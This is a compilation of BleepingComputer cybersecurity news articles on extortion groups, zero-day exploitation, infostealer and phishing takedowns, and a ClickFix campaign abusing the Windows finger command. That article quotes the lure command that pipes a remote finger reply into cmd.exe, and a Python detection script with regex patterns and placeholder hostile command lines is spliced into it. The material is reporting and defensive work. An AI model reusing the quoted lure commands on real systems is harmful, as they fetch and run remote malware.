American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots of internal systems with hackers, after the images were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors.
However, the company noted that its systems were not breached as a result of this incident and that customers' data was not compromised.
"We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally," a CrowdStrike spokesperson told BleepingComputer today.
"Our systems were never compromised and customers remained protected throughout. We have turned the case over to relevant law enforcement agencies."
CrowdStrike did not specify the threat group responsible for the incident or the motivations of the malicious insider who shared screenshots.
However, this statement was provided in response to questions from BleepingComputer regarding screenshots of CrowdStrike systems that were recently posted on Telegram by members of the threat groups ShinyHunters, Scattered Spider, and Lapsus$.
ShinyHunters told BleepingComputer earlier today that they allegedly agreed to pay the insider $25,000 to provide them with access to CrowdStrike's network.
The threat actors claimed they ultimately received SSO authentication cookies from the insider, but by then, the suspected insider had already been detected by CrowdStrike, which had shut down his network access.
The extortion group added that they also attempted to purchase CrowdStrike reports on ShinyHunters and Scattered Spider, but did not receive them.
BleepingComputer contacted CrowdStrike again to confirm if this information is accurate and will update the story if we receive additional information.
The Scattered Lapsus$ Hunters cybercrime collective
These groups, now collectively calling themselves "Scattered Lapsus$ Hunters," have previously launched a data-leak site to extort dozens of companies impacted by a massive wave of Salesforce breaches.
Scattered Lapsus$ Hunters have been targeting Salesforce customers in voice phishing attacks since the start of the year, breaching companies such as Google, Cisco, Allianz Life, Farmers Insurance, Qantas, Adidas, Workday, as well as LVMH subsidiaries, including Dior, Louis Vuitton, and Tiffany & Co.
Companies they attempted to extort include high-profile brands and organizations, such as Google, Cisco, Toyota, Instacart, Cartier, Adidas, Saks Fifth Avenue, Air France & KLM, FedEx, Disney/Hulu, Home Depot, Marriott, Gap, McDonald's, Walgreens, Transunion, HBO MAX, UPS, Chanel, and IKEA.
Scattered Lapsus$ Hunters also claimed responsibility for the Jaguar Land Rover (JLR) breach, stealing sensitive data and significantly disrupting operations, resulting in damages of over £196 million ($220 million) in the last quarter.
As BleepingComputer reported this week, the ShinyHunters and Scattered Spider extortion groups are switching to a new ransomware-as-a-service platform named ShinySp1d3r, after previously using other ransomware gangs' encryptors in attacks, including ALPHV/BlackCat, RansomHub, Qilin, and DragonForce.
This Thursday, ShinyHunters also claimed a new wave of data theft attacks that allegedly impacted Salesforce instances belonging to over 280 companies. In Telegram messages today, they said the list of breached companies contains multiple high-profile names, including LinkedIn, GitLab, Atlassian, Thomson Reuters, Verizon, F5, SonicWall, DocuSign, and Malwarebytes.
As the threat actors told BleepingComputer yesterday, they compromised the Salesforce instances after breaching Gainsight using secrets stolen in the Salesloft drift breach.
bleepingcomputer.com
By Lawrence Abrams
November 15, 2025
The decades-old "finger" command is making a comeback, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.
In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it's rarely used today compared to its popularity decades ago.
When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.
Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.
This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.
Abusing the finger command
Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the "finger root@finger.nateams[.]com" command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.
While that host is no longer accessible, MalwareHunterTeam found additional malware samples and attacks utilizing the finger command.
For example, a person on Reddit recently warned that they fell victim to a ClickFix attack that impersonated a Captcha, prompting them to run a Windows command to verify they were human.
"I just fell for verify you are human win + r. What do I do?," reads the Reddit post.
"I was in a rush and fell for this and ended up entering the following in my cmd prompt:"
"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'"
Although the host is no longer responding to finger requests, another Reddit user captured the output.
This attack abuses the Finger protocol as a remote script delivery method, by running finger vke@finger.cloudmega[.]org and piping its output through the Windows command processor, cmd.exe.
This causes the retrieved commands to be executed, which creates a random-named path, copies curl.exe to a random filename, uses the renamed curl executable to download a zip archive disguised as a PDF [VirusTotal] from cloudmega[.]org, and extracts a Python malware package.
The Python program will then be executed using pythonw.exe init.py.
The final command executed is a call back to the attacker's server to confirm execution, while displaying a fake "Verify you are human" prompt to the user.
It is unclear what the purpose of the Python package is, but a related batch file indicates it was an infostealer.
MalwareHunterTeam also found a similar campaign that uses "finger Kove2@api.metrics-strange.com | cmd" to retrieve and run commands almost identical to the previously mentioned ClickFix attack.
BleepingComputer found this to be a more evolved attack, with the commands looking for tools commonly used in malware research and exiting if found. These tools include filemon, regmon, procexp, procexp64, tcpview, tcpview64, Procmon, Procmon64, vmmap, vmmap64, portmon, processlasso, Wireshark, Fiddler, Everywhere, Fiddler, ida, ida64, ImmunityDebugger, WinDump, x64dbg, x32dbg, OllyDbg, and ProcessHacker.
If no malware analysis tools are found, the commands will download a zip archive disguised as PDF files and extract it. However, instead of extracting a malicious Python package from the fake PDF, it extracts the NetSupport Manager RAT package.
The commands will then configure a scheduled task to launch the remote access malware when the user logs in.
While the current 'finger' abuse appears to be carried out by a single threat actor conducting ClickFix attacks, people continue to fall for these lures, so it is essential to be aware of the campaigns.
For defenders, the best way to block the use of the finger command is to block outgoing traffic to TCP port 79, the port used to connect to a daemon over the Finger protocol.
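Beyond blocking TCP port 79 at the perimeter, the pattern described above (finger fetching a remote "user" and piping the response into cmd.exe) is easy to spot in process-creation telemetry. The following is an added detection example, not code from the article or from any vendor; the event fields and host names are constructed to resemble Sysmon Event ID 1 / Security 4688 records, and the `.invalid` domains are placeholders.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Matches "finger [-l] [user]@host" anywhere in a command line. Windows'
# finger.exe accepts an optional -l flag; the user part may be empty.
FINGER_RE = re.compile(
    r'\bfinger(?:\.exe)?\s+(?:-l\s+)?(?P<user>[^\s@"]*)@(?P<host>[^\s"|]+)',
    re.IGNORECASE,
)

# Matches a pipe directly after the finger invocation that feeds the server's
# reply into a command interpreter, which is the ClickFix behaviour described.
PIPE_RE = re.compile(
    r'\s*\|\s*"?(?P<interp>cmd|powershell|pwsh)(?:\.exe)?\b', re.IGNORECASE
)


@dataclass
class Finding:
    host: str            # finger server contacted (where the "script" comes from)
    user: str            # "user" argument, effectively the payload selector
    piped_to: Optional[str]  # interpreter the reply is piped into, if any
    severity: str        # "high" when piped into an interpreter, else "low"
    command_line: str


def inspect_command_line(command_line: str) -> Optional[Finding]:
    """Return a Finding if the command line invokes finger against a host.

    Any finger usage is worth a look because the tool is rarely used today;
    finger output piped straight into cmd/powershell is the remote-script
    delivery trick and is rated high.
    """
    m = FINGER_RE.search(command_line)
    if not m:
        return None
    pipe = PIPE_RE.match(command_line, m.end())
    interp = pipe.group("interp").lower() if pipe else None
    return Finding(
        host=m.group("host"),
        user=m.group("user"),
        piped_to=interp,
        severity="high" if interp else "low",
        command_line=command_line,
    )


def scan_events(events: Iterable[dict]) -> List[Finding]:
    """Run the check over process-creation events that carry a CommandLine field."""
    findings = []
    for event in events:
        finding = inspect_command_line(event.get("CommandLine", ""))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample events (not real telemetry). The first mirrors the shape of
# the Win+R lure quoted in the article, with a placeholder domain.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd /c start "" /min cmd /c "finger vke@finger.example.invalid | cmd" '
                    "&& echo Verify you are human--press ENTER"},
    {"Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger Kove2@api.example.invalid | cmd"},
    {"Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger alice@intranet-unix.corp.example"},  # benign-looking lookup
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.severity}] finger -> {f.host} (user={f.user!r}, piped_to={f.piped_to})")
```

A low-severity hit on an internal Unix host is a candidate for an allow-list; a high-severity hit should be correlated with the child processes that follow (renamed curl.exe, pythonw.exe, schtasks) as the article describes.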
bleepingcomputer.com
By Bill Toulas
November 12, 2025
An advanced threat actor exploited the critical vulnerabilities “Citrix Bleed 2" (CVE-2025-5777) in NetScaler ADC and Gateway, and CVE-2025-20337 affecting Cisco Identity Service Engine (ISE) as zero-days to deploy custom malware.
Amazon’s threat intelligence team, analyzing “MadPot” honeypot data, found that hackers leveraged the two security issues before they were publicly disclosed and before patches became available.
“Our Amazon MadPot honeypot service detected exploitation attempts for the Citrix Bleed Two vulnerability (CVE-2025-5777) prior to public disclosure, indicating a threat actor had been exploiting the vulnerability as a zero-day,” explains Amazon.
“Through further investigation of the same threat exploiting the Citrix vulnerability, Amazon Threat Intelligence identified and shared with Cisco an anomalous payload targeting a previously undocumented endpoint in Cisco ISE that used vulnerable deserialization logic.”
Citrix Bleed 2 is a NetScaler ADC and Gateway out-of-bounds memory read problem that the vendor published fixes for in late June.
Although the vendor took longer to confirm that the flaw was being leveraged in attacks, despite multiple third-party reports that it was, exploits became available in early July, and CISA tagged it as exploited.
The flaw in ISE (CVE-2025-20337), with a maximum severity score, was published on July 17, when Cisco warned that it could be exploited to let an unauthenticated attacker store malicious files, execute arbitrary code, or gain root privileges on vulnerable devices.
In less than five days, the vendor reissued its warning about CVE-2025-20337 being actively exploited. On July 28, researcher Bobby Gould published technical details in a write-up that included an exploit chain.
In a report shared with BleepingComputer, Amazon says that both flaws were leveraged in APT attacks before Cisco and Citrix published their initial security bulletins.
The hackers leveraged CVE-2025-20337 to gain pre-auth admin access to Cisco ISE endpoints, and deployed a custom web shell named ‘IdentityAuditAction,’ disguised as a legitimate ISE component.
The web shell registered as an HTTP listener to intercept all requests and used Java reflection to inject into Tomcat server threads.
It also employed DES encryption with non-standard base64 encoding for stealth, required knowledge of specific HTTP headers to access, and left minimal forensic traces behind.
The use of multiple undisclosed zero-day flaws and the advanced knowledge of Java/Tomcat internals and the Cisco ISE architecture all point to a highly resourced and advanced threat actor. However, Amazon could not attribute the activity to a known threat group.
Curiously, though, the targeting appeared indiscriminate, which doesn’t match the typically tight scope of highly targeted operations by such threat actors.
It is recommended to apply the available security updates for CVE-2025-5777 and CVE-2025-20337, and to limit access to edge network devices through firewalls and layered access controls.
bleepingcomputer.com
By Lawrence Abrams
November 11, 2025
The Rhadamanthys infostealer operation has been disrupted, with numerous “customers” of the malware-as-a-service reporting that they no longer have access to their servers.
Rhadamanthys is an infostealer malware that steals credentials and authentication cookies from browsers, email clients, and other applications. It is commonly distributed through campaigns promoted as software cracks, YouTube videos, or malicious search advertisements.
The malware is offered on a subscription model, where cybercriminals pay the developer a monthly fee for access to the malware, support, and a web panel used to collect stolen data.
Cybersecurity researchers g0njxa and Gi7w0rm, who both monitor malware operations like Rhadamanthys, report that cybercriminals involved in the operation claim that law enforcement gained access to their web panels.
In a post on a hacking forum, some customers state that they lost SSH access to their Rhadamanthys web panels, which now require a certificate to log in rather than their usual root password.
"If your password cannot log in. The server login method has also been changed to certificate login mode, please check and confirm, if so, immediately reinstall your server, erase traces, the German police are acting," wrote one of the customers.
Another Rhadamanthys subscriber claimed they were having the same issues, with their server's SSH access now also requiring certificate-based logins.
"I confirm that guests have visited my server and the password has been deleted.rootServer login became strictly certificate-based, so I had to immediately delete everything and power down the server. Those who installed it manually were probably unscathed, but those who installed it through the "smart panel" were hit hard," wrote another subscriber.
A message from the Rhadamanthys developer says they believe German law enforcement is behind the disruption, as web panels hosted in EU data centers had German IP addresses logging in before the cybercriminals lost access.
G0njxa told BleepingComputer that the Tor onion sites for the malware operation are also offline but do not currently have a police seizure banner, so it is unclear who exactly is behind the disruption.
Multiple researchers who have spoken to BleepingComputer believe this disruption could be related to an upcoming announcement from Operation Endgame, an ongoing law enforcement action targeting malware-as-a-service operations.
Operation Endgame has been behind numerous disruptions since it launched, including against ransomware infrastructure, the AVCheck site, and the SmokeLoader, DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, and SystemBC malware operations.
The Operation Endgame website currently has a timer stating that new action will be disclosed on Thursday.
BleepingComputer contacted the German police, Europol, and the FBI, but has not received a reply at this time.
bleepingcomputer.com
By Sergiu Gatlan
November 7, 2025
Cisco warned this week that two vulnerabilities, which have been used in zero-day attacks, are now being exploited to force ASA and FTD firewalls into reboot loops.
The tech giant released security updates on September 25 to address the two security flaws, stating that CVE-2025-20362 enables remote threat actors to access restricted URL endpoints without authentication, while CVE-2025-20333 allows authenticated attackers to gain remote code execution on vulnerable devices.
When chained, these vulnerabilities allow remote, unauthenticated attackers to gain complete control over unpatched systems.
The same day, CISA issued an emergency directive ordering U.S. federal agencies to secure their Cisco firewall devices against attacks using this exploit chain within 24 hours. CISA also mandated them to disconnect ASA devices reaching their end of support (EoS) from federal organization networks.
Threat monitoring service Shadowserver is currently tracking over 34,000 internet-exposed ASA and FTD instances vulnerable to CVE-2025-20333 and CVE-2025-20362 attacks, down from the nearly 50,000 unpatched firewalls it spotted in September.
Now exploited in DoS attacks
"Cisco previously disclosed new vulnerabilities in certain Cisco ASA 5500-X devices running Cisco Secure Firewall ASA software with VPN web services enabled, discovered in collaboration with several government agencies. We attributed these attacks to the same state-sponsored group behind the 2024 ArcaneDoor campaign and urged customers to apply the available software fixes," a Cisco spokesperson told BleepingComputer this week.
"On November 5, 2025, Cisco became aware of a new attack variant targeting devices running Cisco Secure ASA Software or Cisco Secure FTD Software releases affected by the same vulnerabilities. This attack can cause unpatched devices to unexpectedly reload, leading to denial of service (DoS) conditions."
CISA and Cisco linked the attacks to the ArcaneDoor campaign, which exploited two other Cisco firewall zero-day bugs (CVE-2024-20353 and CVE-2024-20359) to breach government networks worldwide starting in November 2023. The UAT4356 threat group (tracked as STORM-1849 by Microsoft) behind the ArcaneDoor attacks deployed the previously unknown Line Dancer in-memory shellcode loader and Line Runner backdoor malware to maintain persistence on compromised systems.
On September 25, Cisco fixed a third critical vulnerability (CVE-2025-20363) in its Cisco IOS and firewall software, which can allow unauthenticated threat actors to execute arbitrary code remotely. However, it didn't directly link it to the attacks exploiting CVE-2025-20362 and CVE-2025-20333, saying that its Product Security Incident Response Team was "not aware of any public announcements or malicious use of the vulnerability."
Since then, attackers have started exploiting another recently patched RCE vulnerability (CVE-2025-20352) in Cisco networking devices to deploy rootkit malware on unprotected Linux boxes.
More recently, on Thursday, Cisco released security updates to patch critical security flaws in its Contact Center software, which could enable attackers to bypass authentication (CVE-2025-20358) and execute commands with root privileges (CVE-2025-20354).
"We strongly recommend all customers upgrade to the software fixes outlined in our security advisories," Cisco added on Thursday.
bleepingcomputer.com
By Bill Toulas
October 15, 2025
U.S. cybersecurity company F5 disclosed that nation-state hackers breached its systems and stole undisclosed BIG-IP security vulnerabilities and source code.
The company states that it first became aware of the breach on August 9, 2025, with its investigations revealing that the attackers had gained long-term access to its system, including the company's BIG-IP product development environment and engineering knowledge management platform.
F5 is a Fortune 500 tech giant specializing in cybersecurity, cloud management, and application delivery networking (ADN) applications. The company has 23,000 customers in 170 countries, and 48 of the Fortune 50 entities use its products.
BIG-IP is the firm's flagship product used for application delivery and traffic management by many large enterprises worldwide.
No supply-chain risk
It’s unclear how long the hackers maintained access, but the company confirmed that they stole source code, vulnerability data, and some configuration and implementation details for a limited number of customers.
"Through this access, certain files were exfiltrated, some of which contained certain portions of the Company's BIG-IP source code and information about undisclosed vulnerabilities that it was working on in BIG-IP," the company states.
Despite this critical exposure of undisclosed flaws, F5 says there's no evidence that the attackers leveraged the information in actual attacks, such as exploiting the undisclosed flaws against systems. The company also states that it has not seen evidence that the private information has been disclosed.
F5 claims that the threat actors' access to the BIG-IP environment did not compromise its software supply chain or result in any suspicious code modifications.
This includes its platforms that contain customer data, such as its CRM, financial, support case management, or iHealth systems. Furthermore, other products and platforms managed by the company are not compromised, including NGINX, F5 Distributed Cloud Services, or Silverline systems' source code.
Response to the breach
After discovering the intrusion, F5 took remediation action by tightening access to its systems and improving its overall threat monitoring, detection, and response capabilities:
Rotated credentials and strengthened access controls across our systems.
Deployed improved inventory and patch management automation, as well as additional tooling to better monitor, detect, and respond to threats.
Implemented enhancements to our network security architecture.
Hardened our product development environment, including strengthening security controls and monitoring of all software development platforms.
Additionally, the company is focusing on the security of its products through source code reviews and security assessments with support from NCC Group and IOActive.
NCC Group's assessment covered security reviews of critical software components in BIG-IP and portions of the development pipeline in an effort that involved 76 consultants.
IOActive's expertise was called in after the security breach, and the engagement is still in progress. The results so far show no evidence of the threat actor introducing vulnerabilities in critical F5 software source code or the software development build pipeline.
Customers should take action
F5 is still reviewing which customers had their configuration or implementation details stolen and will contact them with guidance.
To help customers secure their F5 environments against risks stemming from the breach, the company released updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients.
Despite any evidence "of undisclosed critical or remote code execution vulnerabilities," the company urges customers to prioritize installing the new BIG-IP software updates.
F5 confirmed that today's updates address the potential impact stemming from the stolen undisclosed vulnerabilities.
Furthermore, F5 support makes available a threat hunting guide for customers to improve detection and monitoring in their environment.
New best practices for hardening F5 systems now include automated checks in the F5 iHealth Diagnostic Tool, which can now flag security risks and vulnerabilities, prioritize actions, and provide remediation guidance.
Another recommendation is to enable BIG-IP event streaming to SIEM and configure the systems to log to a remote syslog server and monitor for login attempts.
"Our global support team is available to assist. You can open a MyF5 support case or contact F5 support directly for help updating your BIG-IP software, implementing any of these steps, or to address any questions you may have" - F5
The company added that it has validated the safety of BIG-IP releases through multiple independent reviews by leading cybersecurity firms, including CrowdStrike and Mandiant.
On Monday, F5 announced that it rotated the cryptographic certificates and keys used for signing its digital products. The change affects installing BIG-IP and BIG-IQ TMOS software images while ISO image signature verification is enabled, and installing BIG-IP F5OS tenant images on host systems running F5OS.
Additional guidance for F5 customers comes from UK's National Cyber Security Centre (NCSC) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).
Both agencies recommend identifying all F5 products (hardware, software, and virtualized) and making sure that no management interface is exposed on the public web. If an exposed interface is discovered, companies should conduct a compromise assessment.
F5 notes that it delayed the public disclosure of the incident at the U.S. government's request, presumably to allow enough time to secure critical systems.
"On September 12, 2025, the U.S. Department of Justice determined that a delay in public disclosure was warranted pursuant to Item 1.05(c) of Form 8-K. F5 is now filing this report in a timely manner," explains F5.
F5 states that the incident has no material impact on its operations. All services remain available and are considered safe, based on the latest available evidence.
BleepingComputer has contacted F5 to request more details about the incident, and we will update this post when we receive a response.
bleepingcomputer.com
By Bill Toulas
October 11, 2025
Spanish Guardia Civil have dismantled the “GXC Team” cybercrime operation and arrested its alleged leader, a 25-year-old Brazilian known as “GoogleXcoder.”
The GXC Team operated a crime-as-a-service (CaaS) platform offering AI-powered phishing kits, Android malware, and voice-scam tools via Telegram and a Russian-speaking hacker forum.
“The Civil Guard has dismantled one of the most active criminal organizations in the field of phishing in Spain, with the arrest of a 25-year-old Brazilian young man considered the main provider of tools for the massive theft of credentials in the Spanish-speaking environment,” announced Guardia Civil.
Group-IB has been tracking the operation and says that GXC Team was targeting banks, transport, and e-commerce entities in Spain, Slovakia, the UK, the US, and Brazil.
The phishing kits replicated the websites of tens of Spanish and international institutions, and powered at least 250 phishing sites.
The threat group also developed at least nine Android malware strains that intercepted SMS and one-time passwords (OTPs), useful for hijacking accounts and validating fraudulent transactions.
GXC Team also offered complete technical support and campaign customization services to its clients, acting as a pro-grade and high-yielding crime platform.
A police operation conducted on May 20, involved coordinated raids across Cantabria, Valladolid, Zaragoza, Barcelona, Palma de Mallorca, San Fernando, and La Línea de la Concepción.
During these actions, the authorities seized electronic devices containing phishing kit source code, communications with clients, and financial records.
Law enforcement agents recovered cryptocurrency stolen from victims and shut down Telegram channels used to promote the scams. One of these channels was named “Steal everything from grandmothers.”
The authorities stated that the nationwide raids were made possible thanks to the analysis of the seized devices and cryptocurrency transactions of GoogleXcoder, who was arrested more than a year ago.
“The forensic analysis of the seized devices, as well as the cryptocurrency transactions, which lasted for more than a year due to their complexity, made it possible to reconstruct the entire criminal network, managing to identify six people directly related to the use of these services,” explained Guardia Civil.
The investigation into the GXC Team is still ongoing, and Spanish authorities have mentioned the possibility of further actions leading to the arrest of more members of the cybercrime ring.
bleepingcomputer.com
By Sergiu Gatlan
October 3, 2025
An extortion group has launched a new data leak site to publicly extort dozens of companies impacted by a wave of Salesforce breaches, leaking samples of data stolen in the attacks.
The threat actors responsible for these attacks claim to be part of the ShinyHunters, Scattered Spider, and Lapsus$ groups, collectively referring to themselves as "Scattered Lapsus$ Hunters."
Today, they launched a new data leak site containing 39 companies impacted by the attacks. Each entry includes samples of data allegedly stolen from victims' Salesforce instances, and warns the victims to reach out to "prevent public disclosure" of their data before the October 10 deadline is reached.
The companies being extorted on the data leak site include well-known brands and organizations, including FedEx, Disney/Hulu, Home Depot, Marriott, Google, Cisco, Toyota, Gap, McDonald's, Walgreens, Instacart, Cartier, Adidas, Saks Fifth Avenue, Air France & KLM, Transunion, HBO MAX, UPS, Chanel, and IKEA.
"All of them have been contacted long ago, they saw the email because I saw them download the samples multiple times. Most of them chose to not disclose and ignore," ShinyHunters told BleepingComputer.
"We highly advise you proceed into the right decision, your organisation can prevent the release of this data, regain control over the situation and all operations remain stable as always. We highly recommend a decision-maker to get involved as we are presenting a clear and mutually beneficial opportunity to resolve this matter," they warned on the leak site.
The threat actors also added a separate entry requesting that Salesforce pay a ransom to prevent all impacted customers' data (approximately 1 billion records containing personal information) from being leaked.
"Should you comply, we will withdraw from any active or pending negotiation individually from your customers. Your customers will not be attacked again nor will they face a ransom from us again, should you pay," they added.
The extortion group also threatened the company, stating that it would help law firms pursue civil and commercial lawsuits against Salesforce following the data breaches and warned that the company had also failed to protect customers' data as required by the European General Data Protection Regulation (GDPR).
bleepingcomputer.com
By Lawrence Abrams
October 2, 2025
An extortion group calling itself the Crimson Collective claims to have breached Red Hat's private GitHub repositories, stealing nearly 570GB of compressed data across 28,000 internal projects.
This data allegedly includes approximately 800 Customer Engagement Reports (CERs), which can contain sensitive information about a customer's network and platforms.
A CER is a consulting document prepared for clients that often contains infrastructure details, configuration data, authentication tokens, and other information that could be abused to breach customer networks.
Red Hat confirmed that it suffered a security incident related to its consulting business, but would not verify any of the attacker's claims regarding the stolen GitHub repositories and customer CERs.
"Red Hat is aware of reports regarding a security incident related to our consulting business and we have initiated necessary remediation steps," Red Hat told BleepingComputer.
"The security and integrity of our systems and the data entrusted to us are our highest priority. At this time, we have no reason to believe the security issue impacts any of our other Red Hat services or products and are highly confident in the integrity of our software supply chain."
While Red Hat did not respond to any further questions about the breach, the hackers told BleepingComputer that the intrusion occurred approximately two weeks ago.
They allegedly found authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure.
The hacking group also published a complete directory listing of the allegedly stolen GitHub repositories and a list of CERs from 2020 through 2025 on Telegram.
The directory listing of CERs includes a wide range of sectors and well-known organizations such as Bank of America, T-Mobile, AT&T, Fidelity, Kaiser, Mayo Clinic, Walmart, Costco, the U.S. Navy’s Naval Surface Warfare Center, Federal Aviation Administration, the House of Representatives, and many others.
The hackers stated that they attempted to contact Red Hat with an extortion demand but received no response other than a templated reply instructing them to submit a vulnerability report to their security team.
According to them, the created ticket was repeatedly assigned to additional people, including Red Hat's legal and security staff members.
BleepingComputer sent Red Hat additional questions, and we will update this story if we receive more information.
The same group also claimed responsibility for briefly defacing Nintendo’s topic page last week to include contact information and links to their Telegram channel.
bleepingcomputer.com
by Sergiu Gatlan
September 23, 2025
SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices.
"SonicWall SMA 100 10.2.2.2-92sv build has been released with additional file checking, providing the capability to remove known rootkit malware present on the SMA devices," the company said in a Monday advisory.
"SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the 10.2.2.2-92sv version."
The update follows a July report from researchers at the Google Threat Intelligence Group (GTIG), who observed a threat actor tracked as UNC6148 deploying OVERSTEP malware on end-of-life (EoL) SonicWall SMA 100 devices that will reach end-of-support next week, on October 1, 2025.
OVERSTEP is a user-mode rootkit that enables attackers to maintain persistent access by using hidden malicious components and establishing a reverse shell on compromised devices. The malware steals sensitive files, including the persist.database and certificate files, providing hackers with access to credentials, OTP seeds, and certificates that further enable persistence.
While the researchers have not determined the goal behind UNC6148's attacks, they did find "noteworthy overlaps" with Abyss-related ransomware incidents.
For instance, in late 2023, Truesec investigated an Abyss ransomware incident in which hackers installed a web shell on an SMA appliance, enabling them to maintain persistence despite firmware updates. In March 2024, InfoGuard AG incident responder Stephan Berger reported a similar SMA device compromise that also resulted in the deployment of Abyss malware.
"The threat intelligence report from Google Threat Intelligence Group (GTIG) highlights potential risk of using older versions of SMA100 firmware," SonicWall added on Monday, urging admins to implement the security measures outlined in this July advisory.
Last week, SonicWall warned customers to reset credentials after their firewall configuration backup files were exposed in brute-force attacks targeting the API service for cloud backup.
In August, the company also dismissed claims that the Akira ransomware gang was hacking Gen 7 firewalls using a potential zero-day exploit, clarifying that the issue was tied to a critical vulnerability (CVE-2024-40766) that was patched in November 2024.
The Australian Cyber Security Center (ACSC) and cybersecurity firm Rapid7 later confirmed that the Akira gang is exploiting this vulnerability to target unpatched SonicWall devices.
bleepingcomputer.com
Microsoft and Cloudflare have disrupted a massive Phishing-as-a-Service (PhaaS) operation, known as RaccoonO365, that helped cybercriminals steal thousands of Microsoft 365 credentials.
In early September 2025, in coordination with Cloudflare's Cloudforce One and Trust and Safety teams, Microsoft's Digital Crimes Unit (DCU) disrupted the cybercrime operation by seizing 338 websites and Worker accounts linked to RaccoonO365.
The cybercrime group behind this service (also tracked by Microsoft as Storm-2246) has stolen at least 5,000 Microsoft credentials from 94 countries since at least July 2024, using RaccoonO365 phishing kits that bundled CAPTCHA pages and anti-bot techniques to appear legitimate and evade analysis.
For instance, a large-scale RaccoonO365 tax-themed phishing campaign targeted over 2,300 organizations in the United States in April 2025, but these phishing kits have also been deployed in attacks against more than 20 U.S. healthcare organizations.
The credentials, cookies, and other data stolen from victims' OneDrive, SharePoint, and email accounts were later employed in financial fraud attempts, extortion attacks, or as initial access to other victims' systems.
"This puts public safety at risk, as RaccoonO365 phishing emails are often a precursor to malware and ransomware, which have severe consequences for hospitals," said Steven Masada, Assistant General Counsel for Microsoft's Digital Crimes Unit.
"In these attacks, patient services are delayed, critical care is postponed or canceled, lab results are compromised, and sensitive data is breached, causing major financial losses and directly impacting patients."
RaccoonO365 has been renting subscription-based phishing kits through a private Telegram channel, which had over 840 members as of August 25, 2025. The prices ranged from $355 for a 30-day plan to $999 for a 90-day subscription, all paid in USDT (TRC20, BEP20, Polygon) or Bitcoin (BTC) cryptocurrency.
Microsoft estimated that the group has received at least $100,000 in cryptocurrency payments so far, suggesting there are approximately 100 to 200 subscriptions; however, the actual number of subscriptions sold is likely much higher.
During its investigation, the Microsoft DCU also found that the leader of RaccoonO365 is Joshua Ogundipe, who lives in Nigeria.
Cloudflare also believes that RaccoonO365 collaborates with Russian-speaking cybercriminals, given the use of Russian in its Telegram bot's name.
"Based on Microsoft's analysis, Ogundipe has a background in computer programming and is believed to have authored the majority of the code," Masada added.
"An operational security lapse by the threat actors in which they inadvertently revealed a secret cryptocurrency wallet helped the DCU's attribution and understanding of their operations. A criminal referral for Ogundipe has been sent to international law enforcement."
In May, Microsoft also seized 2,300 domains in a coordinated disruption action targeting the Lumma malware-as-a-service (MaaS) information stealer.